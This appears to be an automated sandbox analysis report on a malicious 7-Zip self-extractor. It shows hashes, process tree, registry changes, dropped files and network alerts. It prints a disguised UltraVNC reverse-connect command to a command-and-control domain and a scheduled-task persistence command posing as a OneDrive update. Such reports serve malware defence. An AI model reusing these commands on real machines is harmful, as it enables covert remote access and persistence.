| File name: | 7ZSfxMod_x86.exe |
| Full analysis: | https://app.any.run/tasks/af8fb06f-4565-4800-9392-2c289a59b96c |
| Verdict: | Malicious activity |
| Analysis date: | September 26, 2023, 11:39:35 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-dosexec |
| File info: | PE32 executable (GUI) Intel 80386, for MS Windows |
| MD5: | 532AC56AB8F092CAF5FE714956DD3D2C |
| SHA1: | 9D0B6245900A141D75FA19AB063AB6E874035D92 |
| SHA256: | FBB6D99412B83621DC8F5293D42EBC75546D9144CAB5F43FDDC40D3F0C61DAAC |
| SSDEEP: | 49152:xF6Ow+i/cx6iIybvy0B7CsbDMmSZhQQd84MSL6I3kL+97t5m6WUmSNtjQz0:xw/c8PybvnyNMG6dL6J59LZtjQo |
| .exe | | | Generic Win/DOS Executable (50) |
|---|---|---|
| .exe | | | DOS Executable Generic (49.9) |
| ProductVersion: | 1.5.0.2712 |
|---|---|
| ProductName: | 7-Zip SFX |
| PrivateBuild: | December 30, 2012 |
| OriginalFileName: | 7ZSfxMod_x86.exe |
| LegalCopyright: | Copyright © 2005-2012 Oleg N. Scherbakov |
| InternalName: | 7ZSfxMod |
| FileVersion: | 1.5.0.2712 |
| FileDescription: | 7z Setup SFX (x86) |
| CompanyName: | Oleg N. Scherbakov |
| CharacterSet: | Unicode |
| LanguageCode: | Neutral |
| FileSubtype: | - |
| ObjectFileType: | Executable application |
| FileOS: | Windows NT 32-bit |
| FileFlags: | Private build |
| FileFlagsMask: | 0x003f |
| ProductVersionNumber: | 1.5.0.2712 |
| FileVersionNumber: | 1.5.0.2712 |
| Subsystem: | Windows GUI |
| SubsystemVersion: | 4 |
| ImageVersion: | - |
| OSVersion: | 4 |
| EntryPoint: | 0x1382f |
| UninitializedDataSize: | - |
| InitializedDataSize: | 187392 |
| CodeSize: | 78336 |
| LinkerVersion: | 8 |
| PEType: | PE32 |
| ImageFileCharacteristics: | No relocs, Executable, 32-bit |
| TimeStamp: | 2012:12:30 08:49:49+00:00 |
| MachineType: | Intel 386 or later, and compatibles |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 280 | "C:\Users\admin\AppData\Local\Temp\OneDrives.exe" -autoreconnect -id:5634_USER-PC -connect softcillection.com:443 | C:\Users\admin\AppData\Local\Temp\OneDrives.exe | — | cmd.exe | |||||||||||
User: admin Company: UltraVNC Integrity Level: MEDIUM Description: OneDriver Exit code: 0 Version: 1.1.9.4 Modules
| |||||||||||||||
| 464 | taskkill /f /im OneDrives.exe | C:\Windows\SysWOW64\taskkill.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 836 | "C:\Users\admin\AppData\Local\Temp\OneDrives.exe" | C:\Users\admin\AppData\Local\Temp\OneDrives.exe | cmd.exe | ||||||||||||
User: admin Company: UltraVNC Integrity Level: MEDIUM Description: OneDriver Exit code: 0 Version: 1.1.9.4 Modules
| |||||||||||||||
| 984 | "C:\Windows\System32\cmd.exe" /c cd C:\Users\admin\AppData\Local\Temp & idmt_j1h27dc7f5g3dy6s3d96sdx25.cmd | C:\Windows\SysWOW64\cmd.exe | — | 7ZSfxMod_x86.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1248 | schtasks /create /f /tn "OneDrive Standalone Update Task-G-5-4-2023-120937178287-130937375508-082110380055-1304" /tr "C:\Users\admin\AppData\Local\Temp\OneDrives.exe" /sc daily /st 10:55 | C:\Windows\SysWOW64\schtasks.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1480 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Exit code: 0 Version: 14.0.4756.1000 Modules
| |||||||||||||||
| 1532 | timeout /t 2 | C:\Windows\SysWOW64\timeout.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1604 | timeout /t 8 | C:\Windows\SysWOW64\timeout.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2312 | timeout /t 4 | C:\Windows\SysWOW64\timeout.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2364 | "C:\Windows\System32\cmd.exe" /c ren idmt_j1h27dc7f5g3dy6s3d96sdx25 idmt_j1h27dc7f5g3dy6s3d96sdx25.cmd | C:\Windows\SysWOW64\cmd.exe | — | 7ZSfxMod_x86.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| (PID) Process: | (2552) 7ZSfxMod_x86.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (2552) 7ZSfxMod_x86.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (2552) 7ZSfxMod_x86.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (2552) 7ZSfxMod_x86.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (1480) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (1480) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: On | |||
| (PID) Process: | (1480) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: On | |||
| (PID) Process: | (1480) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1046 |
Value: On | |||
| (PID) Process: | (1480) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1036 |
Value: On | |||
| (PID) Process: | (1480) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1031 |
Value: On | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\MSRC4Plugin_for_sc.dsm | executable | |
MD5:922E7761577DFC796D53589C630707B3 | SHA256:4EBA9521CF0F739549940B4AC347FDC1A6399CA646831A9EF6CF3E15D47F91AD | |||
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\GMmfbqfPpfSwfelfbzfovfUS.jpg | text | |
MD5:52055C6FABD51791E7ADF33A4B18CB69 | SHA256:428CABE1837A67C8AA2901EB4383FF0EE93AFAF43AABCA64837C58FC010EAF8B | |||
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\ZdZabcaMOaiuasVaKSaghaeb.jpg | text | |
MD5:A081BE4D317E49923EE3A38F938521A7 | SHA256:1D441147B868E3397403BF59A1BC2B5C1927C6ECA1A467BC2FE68EB5E332A518 | |||
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\jhdytgslksjdh83.jpg | text | |
MD5:A8BFC9F4D2A65EA596481D6B576E41D4 | SHA256:55B8FB521F80BB84BF71555B9B2DFFC23730C9986B423DE30AA155CCEC1BE03F | |||
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\kjghdfncjduyta974jodutwbhdue72kvjfik.jpg | text | |
MD5:A081BE4D317E49923EE3A38F938521A7 | SHA256:1D441147B868E3397403BF59A1BC2B5C1927C6ECA1A467BC2FE68EB5E332A518 | |||
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\AnELUtLhILTOLtHLBYLROLPu.jpg | text | |
MD5:A165920E79B7CD06D099C60F083D888F | SHA256:63C0C13912D2E97B7E745517812DF8EBF99A81A9D8F74119C72D04EFEEE5B494 | |||
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\UltraVNC.ini | text | |
MD5:E265D15A83E52B9CED30F6A9D747B388 | SHA256:20B23CC90CBFBEF9BB7CEDFBB1B75F24A03BA96AF8C576263077501814DF6376 | |||
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\idmt_j1h27dc7f5g3dy6s3d96sdx25 | text | |
MD5:3B562C168B6B3AB020CE75CC976DB755 | SHA256:0441FF97BB73A55AE1599C49E8E6F09EF77EB637936CFACDCD9DAAF3C4B372CB | |||
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\rc4.key | binary | |
MD5:3A3BBDF24FB500BBD12DFE94BA84A007 | SHA256:3225058AFBDF79B87D39A3BE884291D7BA4ED6EC93D1C2010399E11962106D5B | |||
| 2552 | 7ZSfxMod_x86.exe | C:\Users\admin\AppData\Local\Temp\7ZipSfx.000\ljhdynahdlfouypdhfy9763-072bkludfhjk.jpg | text | |
MD5:34CB509725E80E00F625E984CC612827 | SHA256:42DCF90E058463B64BD65F8961AB3EA292082291BC58B79B5388E51A6AAA7DF4 | |||
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
332 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | unknown |
1208 | svchost.exe | 239.255.255.250:3702 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1208 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
836 | OneDrives.exe | 188.120.249.17:443 | softcillection.com | JSC IOT | RU | unknown |
Domain | IP | Reputation |
|---|---|---|
softcillection.com |
| unknown |
PID | Process | Class | Message |
|---|---|---|---|
836 | OneDrives.exe | Malware Command and Control Activity Detected | ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon |
836 | OneDrives.exe | Potential Corporate Privacy Violation | SUSPICIOUS [ANY.RUN] VNC negotiation was detected (ProtocolVersion message) |
836 | OneDrives.exe | Malware Command and Control Activity Detected | ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon |
836 | OneDrives.exe | Malware Command and Control Activity Detected | ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon |
836 | OneDrives.exe | Malware Command and Control Activity Detected | ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon |
836 | OneDrives.exe | Malware Command and Control Activity Detected | ET MALWARE Possible Ursnif/Gamaredon Related VNC Module CnC Beacon |